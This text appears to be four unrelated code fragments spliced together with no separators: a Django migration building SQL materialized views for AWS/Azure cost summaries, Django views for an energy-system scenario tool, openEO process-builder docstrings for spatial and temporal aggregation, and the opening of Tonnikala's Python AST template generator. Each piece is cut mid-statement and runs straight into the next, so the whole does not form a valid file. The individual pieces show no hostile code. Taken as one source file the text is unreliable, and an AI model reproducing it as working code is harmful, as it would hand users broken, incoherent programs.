sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary -- Get data for this month or last month WHERE product_family LIKE '%Storage%' AND unit = 'GB-Mo' AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), product_family ) ; CREATE UNIQUE INDEX aws_storage_summary ON reporting_aws_storage_summary (usage_start, product_family) ; CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_service AS( SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, product_code, product_family, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary -- Get data for this month or last month WHERE product_family LIKE '%Storage%' AND unit = 'GB-Mo' AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), product_code, product_family ) ; CREATE UNIQUE INDEX aws_storage_summary_service ON reporting_aws_storage_summary_by_service (usage_start, product_code, product_family) ; CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_account AS( SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id, product_family) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, usage_account_id, account_alias_id, product_family, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary -- Get data for this month or last month WHERE product_family LIKE '%Storage%' AND unit = 'GB-Mo' AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), usage_account_id, account_alias_id, product_family ) ; CREATE UNIQUE INDEX aws_storage_summary_account ON reporting_aws_storage_summary_by_account (usage_start, usage_account_id, account_alias_id, product_family) ; CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_region AS( SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone, product_family) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, region, availability_zone, product_family, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary -- Get data for this month or last month WHERE product_family LIKE '%Storage%' AND unit = 'GB-Mo' AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), region, availability_zone, product_family ) ; CREATE UNIQUE INDEX aws_storage_summary_region ON reporting_aws_storage_summary_by_region (usage_start, region, availability_zone, product_family) ; CREATE MATERIALIZED VIEW reporting_aws_network_summary AS( SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, product_code, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary -- Get data for this month or last month WHERE product_code IN ('AmazonVPC','AmazonCloudFront','AmazonRoute53','AmazonAPIGateway') AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), product_code ) ; CREATE UNIQUE INDEX aws_network_summary ON reporting_aws_network_summary (usage_start, product_code) ; CREATE MATERIALIZED VIEW reporting_aws_database_summary AS( SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, product_code, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary -- Get data for this month or last month WHERE product_code IN ('AmazonRDS','AmazonDynamoDB','AmazonElastiCache','AmazonNeptune','AmazonRedshift','AmazonDocumentDB') AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), product_code ) ; CREATE UNIQUE INDEX aws_database_summary ON reporting_aws_database_summary (usage_start, product_code) ; """ ), migrations.RunSQL( sql=""" CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_daily_summary AS ( SELECT row_number() OVER () as id, lids.* FROM ( SELECT 'AWS' as source_type, cluster_id, cluster_alias, namespace, node, resource_id, usage_start, usage_end, usage_account_id, account_alias_id, product_code, product_family, instance_type, region, availability_zone, tags, usage_amount, unit, unblended_cost, markup_cost, currency_code, shared_projects, project_costs FROM reporting_ocpawscostlineitem_daily_summary WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) UNION SELECT 'Azure' as source_type, cluster_id, cluster_alias, namespace, node, resource_id, usage_start, usage_end, subscription_guid as usage_account_id, NULL::int as account_alias_id, service_name as product_code, NULL as product_family, instance_type, resource_location as region, NULL as availability_zone, tags, usage_quantity as usage_amount, unit_of_measure as unit, pretax_cost as unblended_cost, markup_cost, currency as currency_code, shared_projects, project_costs FROM reporting_ocpazurecostlineitem_daily_summary WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) AS lids ) ; CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_project_daily_summary AS ( SELECT row_number() OVER () as id, lids.* FROM ( SELECT 'AWS' as source_type, cluster_id, cluster_alias, data_source, namespace, node, pod_labels, resource_id, usage_start, usage_end, usage_account_id, account_alias_id, product_code, product_family, instance_type, region, availability_zone, usage_amount, unit, unblended_cost, project_markup_cost, pod_cost, currency_code FROM reporting_ocpawscostlineitem_project_daily_summary WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) UNION SELECT 'Azure' as source_type, cluster_id, cluster_alias, data_source, namespace, node, pod_labels, resource_id, usage_start, usage_end, subscription_guid as usage_account_id, NULL::int as account_alias_id, service_name as product_code, NULL as product_family, instance_type, resource_location as region, NULL as availability_zone, usage_quantity as usage_amount, unit_of_measure as unit, pretax_cost as unblended_cost, project_markup_cost, pod_cost, currency as currency_code FROM reporting_ocpazurecostlineitem_project_daily_summary WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) AS lids ) ; """ ), migrations.CreateModel( name="AWSCostSummaryByAccount", fields=[ ("id", models.IntegerField(primary_key=True, serialize=False)), ("usage_start", models.DateTimeField()), ("usage_end", models.DateTimeField(null=True)), ("usage_account_id", models.CharField(max_length=50)), ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("currency_code", models.CharField(max_length=10)), ], options={"db_table": "reporting_aws_cost_summary_by_account", "managed": False}, ), migrations.CreateModel( name="AWSComputeSummary", fields=[ ("id", models.IntegerField(primary_key=True, serialize=False)), ("usage_start", models.DateTimeField()), ("usage_end", models.DateTimeField(null=True)), ("instance_type", models.CharField(max_length=50, null=True)), ( "resource_ids", django.contrib.postgres.fields.ArrayField( base_field=models.CharField(max_length=256), null=True, size=None ), ), ("resource_count", models.IntegerField(null=True)), ("usage_amount", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("unit", models.CharField(max_length=63, null=True)), ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("currency_code", models.CharField(max_length=10)), ], options={"db_table": "reporting_aws_compute_summary", "managed": False}, ), migrations.CreateModel( name="AWSComputeSummaryByAccount", fields=[ ("id", models.IntegerField(primary_key=True, serialize=False)), ("usage_start", models.DateTimeField()), ("usage_end", models.DateTimeField(null=True)), ("usage_account_id", models.CharField(max_length=50)), ("instance_type", models.CharField(max_length=50, null=True)), ( "resource_ids", django.contrib.postgres.fields.ArrayField( base_field=models.CharField(max_length=256), null=True, size=None ), ), ("resource_count", models.IntegerField(null=True)), ("usage_amount", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("unit", models.CharField(max_length=63, null=True)), ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("currency_code", models.CharField(max_length=10)), ], options={"db_table": "reporting_aws_compute_summary_by_account", "managed": False}, ), migrations.CreateModel( name="AWSComputeSummaryByRegion", fields=[ ("id", models.IntegerField(primary_key=True, serialize=False)), ("usage_start", models.DateTimeField()), ("usage_end", models.DateTimeField(null=True)), ("region", models.CharField(max_length=50, null=True)), ("availability_zone", models.CharField(max_length=50, null=True)), ("instance_type", models.CharField(max_length=50, null=True)), ( "resource_ids", django.contrib.postgres.fields.ArrayField( base_field=models.CharField(max_length=256), null=True, size=None ), ), ("resource_count", models.IntegerField(null=True)), ("usage_amount", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("unit", models.CharField(max_length=63, null=True)), ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)), ("currency_code", models.CharField(max_length=10)), ], options={"db_table": "reporting_aws_compute_summary_by_region", "managed": False}, ), migrations.CreateModel( name="AWSComputeSummaryByService", fields=[ ("id", models.IntegerField(primary_key=True, serialize=False)), ("usage_start", models.DateTimeField()), ("usage_end", models.DateTimeField(null=True)), ("product_code", models.CharField(max_length=50)),
"providers": { "dso": _("Electricity DSO"), "gas_dso": _("Gas DSO"), "h2_dso": _("H2 DSO"), "heat_dso": _("Heat DSO"), }, "production": { "pv_plant": _("PV Plant"), "wind_plant": _("Wind Plant"), "biogas_plant": _("Biogas Plant"), "geothermal_conversion": _("Geothermal Conversion"), "solar_thermal_plant": _("Solar Thermal Plant"), }, "conversion": { # "transformer_station_in": _("Transformer Station (in)"), # "transformer_station_out": _("Transformer Station (out)"), # "storage_charge_controller_in": _("Storage Charge Controller (in)"), # "storage_charge_controller_out": _("Storage Charge Controller (out)"), # "solar_inverter": _("Solar Inverter"), "diesel_generator": _("Diesel Generator"), "fuel_cell": _(" Fuel Cell"), "gas_boiler": _("Gas Boiler"), "electrolyzer": _("Electrolyzer"), "heat_pump": _("Heat Pump"), }, "storage": { "bess": _("Electricity Storage"), # "gess": _("Gas Storage"), # "h2ess": _("H2 Storage"), "hess": _("Heat Storage"), }, "demand": { "demand": _("Electricity Demand"), # "gas_demand": _("Gas Demand"), # "h2_demand": _("H2 Demand"), "heat_demand": _("Heat Demand"), }, "bus": {"bus": _("Bus")}, } group_names = {group: _(group) for group in components.keys()} # TODO: if the scenario exists, load it, otherwise default form if request.method == "POST": # called by function save_topology() in templates/scenario/scenario_step2.html scenario = get_object_or_404(Scenario, pk=scen_id) if request.user != scenario.project.user: raise PermissionDenied topologies = json.loads(request.body) node_list = [NodeObject(topology) for topology in topologies] # delete objects from database which were deleted by the user update_deleted_objects_from_database(scen_id, node_list) # Make sure there are no connections in the Database to prevent inserting the same connections upon updating. ConnectionLink.objects.filter(scenario_id=scen_id).delete() for node_obj in node_list: node_obj.create_connection_links(scen_id) # node_obj.assign_asset_to_proper_group(node_to_db_mapping_dict) return JsonResponse({"success": True}, status=200) else: scenario = get_object_or_404(Scenario, pk=scen_id) # if a simulation object linked to this scenario exists, all steps have been already fullfilled qs_sim = Simulation.objects.filter(scenario=scenario) if qs_sim.exists(): max_step = 5 # this is a dict with keys "busses", "assets" and "links" topology_data_list = load_scenario_topology_from_db(scen_id) return render( request, f"scenario/scenario_step{step_id}.html", { "scenario": scenario, "scen_id": scen_id, "proj_id": scenario.project.id, "proj_name": scenario.project.name, "topology_data_list": json.dumps(topology_data_list), "step_id": step_id, "step_list": STEP_LIST, "max_step": max_step, "components": components, "group_names": group_names, }, ) @login_required @require_http_methods(["GET", "POST"]) def scenario_create_constraints(request, proj_id, scen_id, step_id=3, max_step=4): constraints_labels = { "minimal_degree_of_autonomy": _("Minimal degree of autonomy"), "minimal_renewable_factor": _("Minimal share of renewables"), "maximum_emissions": _("Maximal CO2 emissions"), "net_zero_energy": _("Net zero energy system"), } constraints_forms = { "minimal_degree_of_autonomy": MinDOAConstraintForm, "minimal_renewable_factor": MinRenewableConstraintForm, "maximum_emissions": MaxEmissionConstraintForm, "net_zero_energy": NZEConstraintForm, } constraints_models = { "minimal_degree_of_autonomy": MinDOAConstraint, "minimal_renewable_factor": MinRenewableConstraint, "maximum_emissions": MaxEmissionConstraint, "net_zero_energy": NZEConstraint, } scenario = get_object_or_404(Scenario, pk=scen_id) if (scenario.project.user != request.user) and ( request.user not in scenario.project.viewers.all() ): raise PermissionDenied qs_sim = Simulation.objects.filter(scenario=scenario) if request.method == "GET": # if a simulation object linked to this scenario exists, all steps have been already fullfilled if qs_sim.exists(): max_step = 5 # prepare the forms for each constraint unbound_forms = {} for constraint_type, constraint_form in constraints_forms.items(): # check whether the constraint is already associated to the scenario qs = constraints_models[constraint_type].objects.filter(scenario=scenario) if qs.exists(): unbound_forms[constraint_type] = constraint_form( prefix=constraint_type, instance=qs[0] ) else: unbound_forms[constraint_type] = constraint_form(prefix=constraint_type) return render( request, f"scenario/scenario_step{step_id}.html", { "scenario": scenario, "scen_id": scen_id, "proj_id": scenario.project.id, "proj_name": scenario.project.name, "step_id": step_id, "step_list": STEP_LIST, "max_step": max_step, "forms": unbound_forms, "forms_labels": constraints_labels, }, ) elif request.method == "POST": for constraint_type, form_model in constraints_forms.items(): form = form_model(request.POST, prefix=constraint_type) if form.is_valid(): # check whether the constraint is already associated to the scenario qs = constraints_models[constraint_type].objects.filter( scenario=scenario ) if qs.exists(): if len(qs) == 1: constraint_instance = qs[0] for name, value in form.cleaned_data.items(): if getattr(constraint_instance, name) != value: setattr(constraint_instance, name, value) if qs_sim.exists(): qs_sim.update(status=MODIFIED) else: constraint_instance = form.save(commit=False) constraint_instance.scenario = scenario if constraint_type == "net_zero_energy": constraint_instance.value = constraint_instance.activated constraint_instance.save() return HttpResponseRedirect(reverse("scenario_review", args=[proj_id, scen_id])) @login_required @require_http_methods(["GET", "POST"]) def scenario_review(request, proj_id, scen_id, step_id=4, max_step=5): scenario = get_object_or_404(Scenario, pk=scen_id) if (scenario.project.user != request.user) and ( request.user not in scenario.project.viewers.all() ): raise PermissionDenied if request.method == "GET": html_template = f"scenario/simulation/no-status.html" context = { "scenario": scenario, "scen_id": scen_id, "proj_id": scenario.project.id, "proj_name": scenario.project.name, "step_id": step_id, "step_list": STEP_LIST, "max_step": max_step, "MVS_GET_URL": MVS_GET_URL, "MVS_LP_FILE_URL": MVS_LP_FILE_URL, } qs = Simulation.objects.filter(scenario_id=scen_id) if qs.exists(): simulation = qs.first() if simulation.status == PENDING: fetch_mvs_simulation_results(simulation) context.update( { "sim_id": simulation.id, "simulation_status": simulation.status, "secondsElapsed": simulation.elapsed_seconds, "rating": simulation.user_rating, "mvs_token": simulation.mvs_token, } ) if simulation.status == ERROR: context.update({"simulation_error_msg": simulation.errors}) html_template = "scenario/simulation/error.html" elif simulation.status == PENDING: html_template = "scenario/simulation/pending.html" elif simulation.status == DONE: html_template = "scenario/simulation/success.html" else: print("no simulation existing") return render(request, html_template, context) @login_required @require_http_methods(["GET"]) def back_to_scenario_review(request, proj_id): selected_scenario = get_selected_scenarios_in_cache(request, proj_id) if len(selected_scenario) >= 1: scen_id = selected_scenario[0] answer = scenario_review(request, proj_id, scen_id) else: messages.error( request, _( "No scenario was available in the cache, try refreshing the page and make sure one scenario is selected." ), ) answer = HttpResponseRedirect(request.headers.get("Referer")) return answer SCENARIOS_STEPS = [ scenario_create_parameters, scenario_create_topology, scenario_create_constraints, scenario_review, ] @login_required @require_http_methods(["GET"]) def scenario_steps(request, proj_id, step_id=None, scen_id=None): if request.method == "GET": if step_id is None: return HttpResponseRedirect(reverse("scenario_steps", args=[proj_id, 1])) return SCENARIOS_STEPS[step_id - 1](request, proj_id, scen_id, step_id) # TODO delete this useless code here @login_required @require_http_methods(["GET"]) def scenario_view(request, scen_id, step_id): """Scenario View. GET request only.""" scenario = get_object_or_404(Scenario, pk=scen_id) if (scenario.project.user != request.user) and ( request.user not in scenario.project.viewers.all() ): raise PermissionDenied return HttpResponseRedirect(reverse("project_search", args=[scenario.project.id])) # TODO delete this useless code here @login_required @require_http_methods(["GET"]) def scenario_update(request, scen_id, step_id): """Scenario Update View. POST request only.""" scenario = get_object_or_404(Scenario, pk=scen_id) if scenario.project.user != request.user: raise PermissionDenied if request.POST: form = ScenarioUpdateForm(request.POST) if form.is_valid(): [ setattr(scenario, name, value) for name, value in form.cleaned_data.items() ] scenario.save(update_fields=form.cleaned_data.keys()) return HttpResponseRedirect( reverse("project_search", args=[scenario.project.id]) ) else: raise Http404("An error occurred while updating the Scenario.") @login_required @require_http_methods(["GET"]) def scenario_duplicate(request, scen_id): """duplicates the selected scenario and all of its associated components (topology data included)""" scenario = get_object_or_404(Scenario, pk=scen_id) if scenario.project.user != request.user: raise PermissionDenied # We need to iterate over all the objects related to this scenario and duplicate them # and associate them with the new scenario id. asset_list = Asset.objects.filter(scenario=scenario) bus_list = Bus.objects.filter(scenario=scenario) connections_list = ConnectionLink.objects.filter(scenario=scenario) # simulation_list = Simulation.objects.filter(scenario=scenario) # first duplicate the scenario scenario.pk = None scenario.save() # from now on we are working with the duplicated scenario, not the original old2new_asset_ids_map = duplicate_scenario_objects(asset_list, scenario) old2new_bus_ids_map = duplicate_scenario_objects( bus_list, scenario, old2new_asset_ids_map ) duplicate_scenario_connections( connections_list, scenario, old2new_asset_ids_map, old2new_bus_ids_map ) # duplicate_scenario_objects(simulation_list, scenario) return HttpResponseRedirect(reverse("project_search", args=[scenario.project.id])) @login_required @require_http_methods(["POST"]) def scenario_export(request, proj_id): response = HttpResponseRedirect(reverse("project_search", args=[proj_id])) # get the selected scenarios under the project view and export them into a file scenario_ids = request.POST.get("scenario_ids") if scenario_ids is not None: scenario_ids = json.loads(scenario_ids) scenario_data = [] for scen_id in scenario_ids: scenario = get_object_or_404(Scenario, id=int(scen_id)) scenario_data.append(scenario.export(bind_project_data=True)) response = HttpResponse( json.dumps(scenario_data), content_type="application/json" ) response["Content-Disposition"] = "attachment; filename=scenario.json" return response @login_required @require_http_methods(["POST"]) def scenario_delete(request, scen_id): scenario = get_object_or_404(Scenario, id=scen_id) if scenario.project.user != request.user: logger.warning( f"Unauthorized user tried to delete project scenario with db id = {scen_id}." ) raise PermissionDenied if request.POST: scenario.delete() messages.success(request, "scenario successfully deleted!") return HttpResponseRedirect( reverse("project_search", args=[scenario.project.id]) ) # endregion Scenario @login_required @require_http_methods(["GET", "POST"]) def sensitivity_analysis_create(request, scen_id, sa_id=None, step_id=5): excuses_design_under_development(request) scenario = get_object_or_404(Scenario, id=scen_id) if scenario.project.user != request.user: raise PermissionDenied if request.method == "GET": if sa_id is not None: sa_item = get_object_or_404(SensitivityAnalysis, id=sa_id) sa_form = SensitivityAnalysisForm(scen_id=scen_id, instance=sa_item) sa_status = sa_item.status mvs_token = sa_item.mvs_token else: number_existing_sa = scenario.sensitivityanalysis_set.all().count() sa_item = None sa_status = None mvs_token = None sa_form = SensitivityAnalysisForm( scen_id=scen_id, initial={"name": f"sensitivity_analysis_{number_existing_sa + 1}"}, ) answer = render( request, "scenario/sensitivity_analysis.html", { "proj_id": scenario.project.id, "proj_name": scenario.project.name, "scenario": scenario, "scen_id": scen_id, "step_id": step_id, "step_list": STEP_LIST + [_("Sensitivity analysis")], "max_step": 5, "MVS_SA_GET_URL": MVS_SA_GET_URL, "sa_form": sa_form, "sa_status": sa_status, "sa_id": sa_id, "mvs_token": mvs_token, }, ) if request.method == "POST": qs = request.POST sa_form = SensitivityAnalysisForm(qs) if sa_form.is_valid(): sa_item = sa_form.save(commit=False) # TODO if the reference value is not the same as in the current scenario, duplicate the scenario and bind the duplicate to sa_item # TODO check if the scenario is already bound to a SA sa_item.set_reference_scenario(scenario) try: data_clean = format_scenario_for_mvs(scenario) except Exception as e: error_msg = f"Scenario Serialization ERROR! User: {scenario.project.user.username}. Scenario Id: {scenario.id}. Thrown Exception: {e}." logger.error(error_msg) messages.error(request, error_msg) answer = JsonResponse( {"error": f"Scenario Serialization ERROR! Thrown Exception: {e}."}, status=500, content_type="application/json", ) sa_item.save() # Add the information about the sensitivity analysis to the json data_clean.update(sa_item.payload) # Make simulation request to MVS response = mvs_sensitivity_analysis_request(data_clean) if response is None: error_msg = "Could not communicate with the simulation server." logger.error(error_msg) messages.error(request, error_msg) # TODO redirect to prefilled feedback form / bug form answer = JsonResponse( {"status": "error", "error": error_msg}, status=407, content_type="application/json", ) else: sa_item.mvs_token = response["id"] if response["id"] else None # import pdb; pdb.set_trace() # sa_item.parse_server_response(response) if "status" in response.keys() and ( response["status"] == DONE or response["status"] == ERROR ): # TODO call method to fetch response here sa_item.status
the suffix `_meta`. The new dimension has the dimension labels `total_count` and `valid_count`. """ return _process('aggregate_spatial', data=data, geometries=geometries, reducer=reducer, target_dimension=target_dimension, context=context) def aggregate_spatial_binary(data, geometries, reducer, target_dimension=UNSET, context=UNSET) -> ProcessBuilder: """ Zonal statistics for geometries by binary aggregation :param data: A raster data cube. The data cube implicitly gets restricted to the bounds of the geometries as if ``filter_spatial()`` would have been used with the same values for the corresponding parameters immediately before this process. :param geometries: Geometries as GeoJSON on which the aggregation will be based. :param reducer: A reduction operator to be applied consecutively on tuples of values. It must be both associative and commutative as the execution may be executed in parallel and therefore the order of execution is arbitrary. The reduction operator may be a single process such as ``multiply()`` or consist of multiple sub-processes. :param target_dimension: The new dimension name to be used for storing the results. Defaults to `result`. :param context: Additional data to be passed to the reducer. :return: A vector data cube with the computed results and restricted to the bounds of the geometries. The computed value is stored in dimension with the name that was specified in the parameter `target_dimension`. The computation also stores information about the total count of pixels (valid + invalid pixels) and the number of valid pixels (see ``is_valid()``) for each geometry. These values are stored as new dimension with a dimension name derived from `target_dimension` by adding the suffix `_meta`. The new dimension has the dimension labels `total_count` and `valid_count`. """ return _process('aggregate_spatial_binary', data=data, geometries=geometries, reducer=reducer, target_dimension=target_dimension, context=context) def aggregate_spatial_window(data, reducer, size, boundary=UNSET, align=UNSET, context=UNSET) -> ProcessBuilder: """ Zonal statistics for rectangular windows :param data: A raster data cube with exactly two horizontal spatial dimensions and an arbitrary number of additional dimensions. The process is applied to all additional dimensions individually. :param reducer: A reducer to be applied on the list of values, which contain all pixels covered by the window. A reducer is a single process such as ``mean()`` or a set of processes, which computes a single value for a list of values, see the category 'reducer' for such processes. :param size: Window size in pixels along the horizontal spatial dimensions. The first value corresponds to the `x` axis, the second value corresponds to the `y` axis. :param boundary: Behavior to apply if the number of values for the axes `x` and `y` is not a multiple of the corresponding value in the `size` parameter. Options are: - `pad` (default): pad the data cube with the no-data value `null` to fit the required window size. - `trim`: trim the data cube to fit the required window size. Set the parameter `align` to specifies to which corner the data is aligned to. :param align: If the data requires padding or trimming (see parameter `boundary`), specifies to which corner of the spatial extent the data is aligned to. For example, if the data is aligned to the upper left, the process pads/trims at the lower-right. :param context: Additional data to be passed to the reducer. :return: A data cube with the newly computed values and the same dimensions. The resolution will change depending on the chosen values for the `size` and `boundary` parameter. It usually decreases for the dimensions which have the corresponding parameter `size` set to values greater than 1. The dimension labels will be set to the coordinate at the center of the window. The other dimension properties (name, type and reference system) remain unchanged. """ return _process('aggregate_spatial_window', data=data, reducer=reducer, size=size, boundary=boundary, align=align, context=context) def aggregate_temporal(data, intervals, reducer, labels=UNSET, dimension=UNSET, context=UNSET) -> ProcessBuilder: """ Temporal aggregations :param data: A data cube. :param intervals: Left-closed temporal intervals, which are allowed to overlap. Each temporal interval in the array has exactly two elements: 1. The first element is the start of the temporal interval. The specified instance in time is **included** in the interval. 2. The second element is the end of the temporal interval. The specified instance in time is **excluded** from the interval. The specified temporal strings follow [RFC 3339](https://www.rfc-editor.org/rfc/rfc3339.html). Although [RFC 3339 prohibits the hour to be '24'](https://www.rfc-editor.org/rfc/rfc3339.html#section-5.7), **this process allows the value '24' for the hour** of an end time in order to make it possible that left-closed time intervals can fully cover the day. :param reducer: A reducer to be applied for the values contained in each interval. A reducer is a single process such as ``mean()`` or a set of processes, which computes a single value for a list of values, see the category 'reducer' for such processes. Intervals may not contain any values, which for most reducers leads to no-data (`null`) values by default. :param labels: Distinct labels for the intervals, which can contain dates and/or times. Is only required to be specified if the values for the start of the temporal intervals are not distinct and thus the default labels would not be unique. The number of labels and the number of groups need to be equal. :param dimension: The name of the temporal dimension for aggregation. All data along the dimension is passed through the specified reducer. If the dimension is not set or set to `null`, the data cube is expected to only have one temporal dimension. Fails with a `TooManyDimensions` exception if it has more dimensions. Fails with a `DimensionNotAvailable` exception if the specified dimension does not exist. :param context: Additional data to be passed to the reducer. :return: A new data cube with the same dimensions. The dimension properties (name, type, labels, reference system and resolution) remain unchanged, except for the resolution and dimension labels of the given temporal dimension. """ return _process('aggregate_temporal', data=data, intervals=intervals, reducer=reducer, labels=labels, dimension=dimension, context=context) def aggregate_temporal_period(data, period, reducer, dimension=UNSET, context=UNSET) -> ProcessBuilder: """ Temporal aggregations based on calendar hierarchies :param data: A data cube. :param period: The time intervals to aggregate. The following pre-defined values are available: * `hour`: Hour of the day * `day`: Day of the year * `week`: Week of the year * `dekad`: Ten day periods, counted per year with three periods per month (day 1 - 10, 11 - 20 and 21 - end of month). The third dekad of the month can range from 8 to 11 days. For example, the fourth dekad is Feb, 1 - Feb, 10 each year. * `month`: Month of the year * `season`: Three month periods of the calendar seasons (December - February, March - May, June - August, September - November). * `tropical-season`: Six month periods of the tropical seasons (November - April, May - October). * `year`: Proleptic years * `decade`: Ten year periods ([0-to-9 decade](https://en.wikipedia.org/wiki/Decade#0-to-9_decade)), from a year ending in a 0 to the next year ending in a 9. * `decade-ad`: Ten year periods ([1-to-0 decade](https://en.wikipedia.org/wiki/Decade#1-to-0_decade)) better aligned with the anno Domini (AD) calendar era, from a year ending in a 1 to the next year ending in a 0. :param reducer: A reducer to be applied for the values contained in each period. A reducer is a single process such as ``mean()`` or a set of processes, which computes a single value for a list of values, see the category 'reducer' for such processes. Periods may not contain any values, which for most reducers leads to no-data (`null`) values by default. :param dimension: The name of the temporal dimension for aggregation. All data along the dimension is passed through the specified reducer. If the dimension is not set or set to `null`, the data cube is expected to only have one temporal dimension. Fails with a `TooManyDimensions` exception if it has more dimensions. Fails with a `DimensionNotAvailable` exception if the specified dimension does not exist. :param context: Additional data to be passed to the reducer. :return: A
<reponame>tetframework/Tonnikala import ast from ast import * from collections.abc import Iterable from .astalyzer import FreeVarFinder from ..base import LanguageNode, ComplexNode, BaseGenerator from ...helpers import StringWithLocation from ...runtime.debug import TemplateSyntaxError import sys try: # pragma: no cover import sysconfig HAS_ASSERT = bool(sysconfig.get_config_var('Py_DEBUG')) del sysconfig except ImportError: # pragma: no cover HAS_ASSERT = False name_counter = 0 ALWAYS_BUILTINS = ''' False True None '''.split() def simple_call(func, args=None): return Call(func=func, args=args or [], keywords=[], starargs=None, kwargs=None) def create_argument_list(arguments): return [arg(arg=id, annotation=None) for id in arguments] def simple_function_def(name, arguments=()): arguments = create_argument_list(arguments) if sys.version_info >= (3, 8): extra = {'posonlyargs': []} else: extra = {} return FunctionDef( name=name, args=ast.arguments( args=arguments, vararg=None, varargannotation=None, kwonlyargs=[], kwarg=None, kwargannotation=None, defaults=[], kw_defaults=[], **extra ), body=[Pass()], decorator_list=[], returns=None ) def NameX(id, store=False): return Name(id=id, ctx=Load() if not store else Store()) def adjust_locations(ast_node, first_lineno, first_offset): """ Adjust the locations of the ast nodes, offsetting them to the new lineno and column offset """ line_delta = first_lineno - 1 def _fix(node): if 'lineno' in node._attributes: lineno = node.lineno col = node.col_offset # adjust the offset on the first line if lineno == 1: col += first_offset lineno += line_delta node.lineno = lineno node.col_offset = col for child in iter_child_nodes(node): _fix(child) _fix(ast_node) def get_fragment_ast(expression, mode='eval', adjust=(0, 0)): if not isinstance(expression, str): return expression position = getattr(expression, 'position', (1, 0)) position = position[0] + adjust[0], position[1] + adjust[1] tree = None t = None try: exp = expression if expression[-1:] != '\n': exp = expression + '\n' tree = ast.parse(exp, mode=mode) except SyntaxError as e: lineno = e.lineno lineno += position[0] - 1 t = TemplateSyntaxError(e.msg, lineno=lineno) if tree is None: raise t adjust_locations(tree, position[0], position[1]) return tree.body def gen_name(typename=None): global name_counter name_counter += 1 if typename: return "__TK__typed__%s__%d__" % (typename, name_counter) else: return "__TK_%d__" % (name_counter) def static_eval(expr): if isinstance(expr, UnaryOp) and isinstance(expr.op, Not): return not static_eval(expr.operand) return literal_eval(expr) def static_expr_to_bool(expr): try: return bool(static_eval(expr)) except: return None class PythonNode(LanguageNode): is_top_level = False def generate_output_ast(self, code, generator, parent, escape=False, position=None): func = Name(id='__TK__output', ctx=Load()) if not isinstance(code, list): code = [code] rv = [] for i in code: if position is not None: i.lineno, i.col_offset = position e = Expr(simple_call(func, [i])) e.output_args = [i] rv.append(e) return rv def make_buffer_frame(self, body): new_body = [] new_body.append(Assign( targets=[ NameX('__TK__output', store=True), ], value=simple_call( NameX('__TK__mkbuffer') ) )) new_body.extend(body) new_body.append(Return(value=NameX('__TK__output'))) return new_body def make_function(self, name, body, add_buffer=False, arguments=()): # ensure that the function name is an str func = simple_function_def(str(name), 